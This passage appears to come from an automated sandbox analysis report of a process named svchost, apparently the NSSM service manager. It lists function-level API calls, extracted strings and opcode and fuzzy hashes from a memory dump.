                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _fwprintf
                                                    • String ID: %s$( B
                                                    • API String ID: 394020290-3552019876
                                                    • Opcode ID: fb6fc9bafc8bb4bc176331903f766b2f4ebe819c5f0e0d4e4c6cfed62a37235d
                                                    • Instruction ID: 76538ebeed6a30712826624a3ba4fa343d335bada35abf236fb5f47343afded2
                                                    • Opcode Fuzzy Hash: fb6fc9bafc8bb4bc176331903f766b2f4ebe819c5f0e0d4e4c6cfed62a37235d
                                                    • Instruction Fuzzy Hash: 8F313EB2A001007BD6109B766C45FAB775CDE85379F44053BFB58C3252EA28D885C67E
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: P%B$`'B$$B
                                                    • API String ID: 3494438863-3853432223
                                                    • Opcode ID: 997647b863712a435c9349e70150364966e4c23e1ae828604da497abfce903e7
                                                    • Instruction ID: 1080d359621281dac9eb6ef5654e348f9a9ff66b954d09d266db2da5be3808d7
                                                    • Opcode Fuzzy Hash: 997647b863712a435c9349e70150364966e4c23e1ae828604da497abfce903e7
                                                    • Instruction Fuzzy Hash: 3A11E73130461167E7348A2E7EA07E62393FB98324B94813FE601C73D0EAB8D8D3864C
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00416100
                                                      • Part of subcall function 00416431: __getptd_noexit.LIBCMT ref: 00416434
                                                      • Part of subcall function 00416431: __amsg_exit.LIBCMT ref: 00416441
                                                    • __getptd.LIBCMT ref: 00416117
                                                    • __amsg_exit.LIBCMT ref: 00416125
                                                    • __lock.LIBCMT ref: 00416135
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                    • String ID: x/B
                                                    • API String ID: 3521780317-795736107
                                                    • Opcode ID: 03e2c8ac26ea6515eeabbe517bac99320c8abe5d28215d78f32520cca3b08236
                                                    • Instruction ID: d97fba921eb6448607c153e5393f7921dba5c81f8b41dce901700528dcdb7151
                                                    • Opcode Fuzzy Hash: 03e2c8ac26ea6515eeabbe517bac99320c8abe5d28215d78f32520cca3b08236
                                                    • Instruction Fuzzy Hash: DDF06231900210ABD620BB6995027CD73E0AF44729F52811FA58097393CB2CD9818A5E
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000EBA0,?,00000000,00000000), ref: 0040F356
                                                    • GetLastError.KERNEL32(00000000), ref: 0040F361
                                                    • RtlWakeConditionVariable.NTDLL(?), ref: 0040F3D7
                                                    • SetServiceStatus.ADVAPI32(?,?), ref: 0040F45A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConditionCreateErrorLastServiceStatusThreadVariableWake
                                                    • String ID:
                                                    • API String ID: 1631654564-0
                                                    • Opcode ID: a830473311122d4f58078e63b060d65950c81e0407da7c18076417680fa3d974
                                                    • Instruction ID: bb6d87cbd09c4234cba0dee68d7b7d15a758b73580d713f38b937c70a6fac446
                                                    • Opcode Fuzzy Hash: a830473311122d4f58078e63b060d65950c81e0407da7c18076417680fa3d974
                                                    • Instruction Fuzzy Hash: 544196F2904700EAE774DB64EC4AB9777A89B54304F004D3EF24EA71C2D67DB8558B68
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0041192C
                                                    • HeapFree.KERNEL32(00000000), ref: 00411933
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 5f40a348833435727a258736f11675b437c072e383ba136c01367595f6cefcd7
                                                    • Instruction ID: 95e30e043aeee65d45f2ad13466b3714bbfccf5d3bd7e18b30c1f789b8d743ce
                                                    • Opcode Fuzzy Hash: 5f40a348833435727a258736f11675b437c072e383ba136c01367595f6cefcd7
                                                    • Instruction Fuzzy Hash: 802156B5A043006FD700DBA9DC85F9B77E8EBC8714F444A69F958C7290D678ED48C762
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0041160C
                                                    • HeapFree.KERNEL32(00000000), ref: 00411613
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 7a493bd9209aa930e9bc628240199728c948fb4e2bca7b9b2bb2fbd14f4429dc
                                                    • Instruction ID: b959b81e1fe3a2bafc76a74eee7c013ba47a19e295bb6f17c30615ef93d79162
                                                    • Opcode Fuzzy Hash: 7a493bd9209aa930e9bc628240199728c948fb4e2bca7b9b2bb2fbd14f4429dc
                                                    • Instruction Fuzzy Hash: 7A2156B5A043006BD600DBA9DC85F9B77E8EBC8714F444A6DF958C7290D678ED08C766
                                                    APIs
                                                    • __lock.LIBCMT ref: 004141AE
                                                      • Part of subcall function 004145CC: __mtinitlocknum.LIBCMT ref: 004145E2
                                                      • Part of subcall function 004145CC: __amsg_exit.LIBCMT ref: 004145EE
                                                      • Part of subcall function 004145CC: EnterCriticalSection.KERNEL32(?,?,?,0041267D,?), ref: 004145F6
                                                    • ___sbh_find_block.LIBCMT ref: 004141B9
                                                    • ___sbh_free_block.LIBCMT ref: 004141C8
                                                    • HeapFree.KERNEL32(00000000,?,00420330,0000000C,00416422,00000000,?,004140C2,?,00000001,?,?,00414556,00000018,00420398,0000000C), ref: 004141F8
                                                    • GetLastError.KERNEL32(?,004140C2,?,00000001,?,?,00414556,00000018,00420398,0000000C,004145E7,?,?,?,0041267D,?), ref: 00414209
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 2714421763-0
                                                    • Opcode ID: 8ca263cfe194db8b0666dc6fb4ab876aeebdc161e256fe39dabbc450974d78f4
                                                    • Instruction ID: 78ddf74b6f23589f7df2c05dcf936a3b5e981393fab6882f78671dd489d308d8
                                                    • Opcode Fuzzy Hash: 8ca263cfe194db8b0666dc6fb4ab876aeebdc161e256fe39dabbc450974d78f4
                                                    • Instruction Fuzzy Hash: A8018F31E41201AADB306BA29C0ABCE7BA49F81769F51425FF404A6191CB7C8AC1CA9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: kill_process
                                                    • API String ID: 0-4017559064
                                                    • Opcode ID: c85e92e42890c1b61c6ed8003c775d2debb2e2522625328e364df6d926ae03a5
                                                    • Instruction ID: 00686baf9cae64c418d2207327e1e792f3237e2728e58617ed409f1897315a47
                                                    • Opcode Fuzzy Hash: c85e92e42890c1b61c6ed8003c775d2debb2e2522625328e364df6d926ae03a5
                                                    • Instruction Fuzzy Hash: 53317675504300AED711DA29AC45BE7B7D8BF84718F44893EED98622C1E3BCEA18C697
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040880C
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,00000000), ref: 0040884B
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeleteDeregisterRegisterReportValue__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: %s%s$delete_createfile_parameter()
                                                    • API String ID: 1707313777-3045456684
                                                    • Opcode ID: 7e0672d7530e772f14729283f7dc31a498a76e7525d1e09c63b7890c8cbcece8
                                                    • Instruction ID: d1234627bce7d3409ed959c761f7b8d746fd5414b944bb09aaf7c4e8fca72bae
                                                    • Opcode Fuzzy Hash: 7e0672d7530e772f14729283f7dc31a498a76e7525d1e09c63b7890c8cbcece8
                                                    • Instruction Fuzzy Hash: 6201DFB2A142006FE700A759CD02FEFB7E8AB99714F80051EF615D72D1F5B8A8818BD6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LocalSystem$NT Authority\LocalService
                                                    • API String ID: 0-2498893882
                                                    • Opcode ID: 4bd61c4bc6cb448a9bbe4fa92f22af8cd3c41b511943c0e539e243abe0924b40
                                                    • Instruction ID: 5088a37f203b1a9eb05045d2fec1edf7ec2d004d2db4fae365a24f9b45aa7680
                                                    • Opcode Fuzzy Hash: 4bd61c4bc6cb448a9bbe4fa92f22af8cd3c41b511943c0e539e243abe0924b40
                                                    • Instruction Fuzzy Hash: 35E0483179452A62DB212B2CBC05FD727995B45742F448073B450DB1D2D75CCDC352ED
                                                    APIs
                                                    • ___addlocaleref.LIBCMT ref: 004160C8
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FA0
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FAD
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FBA
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FC7
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FD4
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FF0
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(00000000), ref: 00416000
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00416016
                                                    • ___removelocaleref.LIBCMT ref: 004160D3
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(004178FE), ref: 00416037
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(83000001), ref: 00416044
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(B9C972C2), ref: 00416051
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B660AC2), ref: 0041605E
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B66D18B), ref: 0041606B
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B66D18B), ref: 00416087
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(83C0B70F), ref: 00416097
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(000009B2), ref: 004160AD
                                                    • ___freetlocinfo.LIBCMT ref: 004160E7
                                                      • Part of subcall function 00415E45: ___free_lconv_mon.LIBCMT ref: 00415E8B
                                                      • Part of subcall function 00415E45: ___free_lconv_num.LIBCMT ref: 00415EAC
                                                      • Part of subcall function 00415E45: ___free_lc_time.LIBCMT ref: 00415F31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                    • String ID: x/B
                                                    • API String ID: 467427115-795736107
                                                    • Opcode ID: d1c564f02e998aee3c3fa80c54e1f8df227aa337fe82c91f75564be1846c7342
                                                    • Instruction ID: b34a0f9879d2699f7ffcf6201956a3b00b8b15cae77dc86b8d387886a1ceb3e8
                                                    • Opcode Fuzzy Hash: d1c564f02e998aee3c3fa80c54e1f8df227aa337fe82c91f75564be1846c7342
                                                    • Instruction Fuzzy Hash: C7E04F33B019315B8A36AE1D64406EB9A948FCA715F1B41AFF844A7784DF2CCCC154AD
                                                    APIs
                                                    • GetConsoleWindow.KERNEL32 ref: 004098D0
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleFreeLocalWindow_vfwprintf
                                                    • String ID: 2.24$2014-08-31$32-bit
                                                    • API String ID: 1334155653-2354707097
                                                    • Opcode ID: 990dfce23d7a97a5039eabe4122512bd76cb627f2bc899cb7b24c49a62b2ecd3
                                                    • Instruction ID: c76862b1d953f522f71d38d82470cec42d68d54e25fb047d8ef406d997cf9da4
                                                    • Opcode Fuzzy Hash: 990dfce23d7a97a5039eabe4122512bd76cb627f2bc899cb7b24c49a62b2ecd3
                                                    • Instruction Fuzzy Hash: 01D0C2F0A8460137E600AA598C07F8B22409B8470DFC4006AB606A52D2D67CF8944A5D
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041A8E7
                                                    • __isleadbyte_l.LIBCMT ref: 0041A91B
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00412F07,?,00000000,00000000,?,?,?,?,00412F07), ref: 0041A94C
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00412F07,00000001,00000000,00000000,?,?,?,?,00412F07), ref: 0041A9BA
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 7d0f7be5522bebe04898bb7a1b5b17ac1f2cd60f464c80a5787e493e5f5524ec
                                                    • Instruction ID: 8e80b7d0e863ddd762db141ba23fd8d99fbbd19addded7427a642c387e288d34
                                                    • Opcode Fuzzy Hash: 7d0f7be5522bebe04898bb7a1b5b17ac1f2cd60f464c80a5787e493e5f5524ec
                                                    • Instruction Fuzzy Hash: 54311370A12245EFDB20EF64C884AFE3BA4BF01310F1589AAE4619B291D334DDE1DB56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: get_service_username()$username
                                                    • API String ID: 0-1118073074
                                                    • Opcode ID: 784faa349208341f158178e86dc57be783a71b656f02ec290f582de94d1f2833
                                                    • Instruction ID: 7d16268e7706c02599106e4441dc23a9752c8f6b5ec33a58098762b0a8250c8b
                                                    • Opcode Fuzzy Hash: 784faa349208341f158178e86dc57be783a71b656f02ec290f582de94d1f2833
                                                    • Instruction Fuzzy Hash: DE1106B6A003015BE710EFA9EC85B9773A8EF84304F048476F91CDB381E379E8588768
                                                    APIs
                                                    • SetEnvironmentVariableW.KERNEL32(?,00000000), ref: 004050E4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004050F1
                                                    • HeapFree.KERNEL32(00000000), ref: 004050F8
                                                    • SetEnvironmentVariableW.KERNEL32(?,00000000), ref: 00405106
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentHeapVariable$FreeProcess
                                                    • String ID:
                                                    • API String ID: 1651283563-0
                                                    • Opcode ID: b44acf5573aec65a98221271f6012cacc703a2aca283ef703b0ef0abf04c4004
                                                    • Instruction ID: 7ca8f0decbef4ebefa15ff84fd483d82a394ef1ad15d6eda22774f96b67548aa
                                                    • Opcode Fuzzy Hash: b44acf5573aec65a98221271f6012cacc703a2aca283ef703b0ef0abf04c4004
                                                    • Instruction Fuzzy Hash: 26117F71C047169AD730AF549C0575BB3F8EF94310F54883BE989A72C1F3B898D48B9A
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00404F26
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00404F2D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID: copy_environment_block()$environment
                                                    • API String ID: 1617791916-2686971372
                                                    • Opcode ID: c3fd064e4f0a956d187f24e7c5e8a9bb3822476e50573aa05cb750d222029aa4
                                                    • Instruction ID: 8deebacdc600d522f7aab138bb3d98dce45cd337f056f7d9729cf224169f9fdd
                                                    • Opcode Fuzzy Hash: c3fd064e4f0a956d187f24e7c5e8a9bb3822476e50573aa05cb750d222029aa4
                                                    • Instruction Fuzzy Hash: 1A01FCF66046221AD6212618BC50BF72298DFD0769B11443BFA82E71C5EA78CC8141A8
                                                    APIs
                                                    • GetSidSubAuthority.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 0040147C
                                                    • GetSidSubAuthority.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 00401491
                                                    • LsaFreeMemory.ADVAPI32(00000000), ref: 004014F1
                                                    • LsaFreeMemory.ADVAPI32(00000000), ref: 004014FB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: AuthorityFreeMemory
                                                    • String ID:
                                                    • API String ID: 1444650384-0
                                                    • Opcode ID: b8e15b337b3f1d921b3dea5c82a8250e1428588c6ab68d38df7715d8a68ab994
                                                    • Instruction ID: 83e81ec0094bd32f467672ea939adaeb78c7e9f3249d369c250e79b353d34dd7
                                                    • Opcode Fuzzy Hash: b8e15b337b3f1d921b3dea5c82a8250e1428588c6ab68d38df7715d8a68ab994
                                                    • Instruction Fuzzy Hash: 81110675A043406FC310EB61C88596BB7E5FF89318F40093DF98997361D638DD91CB99
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00405699
                                                    • GetDesktopWindow.USER32 ref: 0040569F
                                                    • GetWindowRect.USER32(00000000,?), ref: 004056AF
                                                    • MoveWindow.USER32(?,?,?,00000000,?,00000000), ref: 004056E6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$DesktopMove
                                                    • String ID:
                                                    • API String ID: 2894293738-0
                                                    • Opcode ID: 3fd5e5817b5a9b80783906beb4d0b9204ab218456916bf9286cc18b0c0424074
                                                    • Instruction ID: 4404551d088f54b3b346c67006461702cb67daa45ea7307cd0df8ea8ccbf729a
                                                    • Opcode Fuzzy Hash: 3fd5e5817b5a9b80783906beb4d0b9204ab218456916bf9286cc18b0c0424074
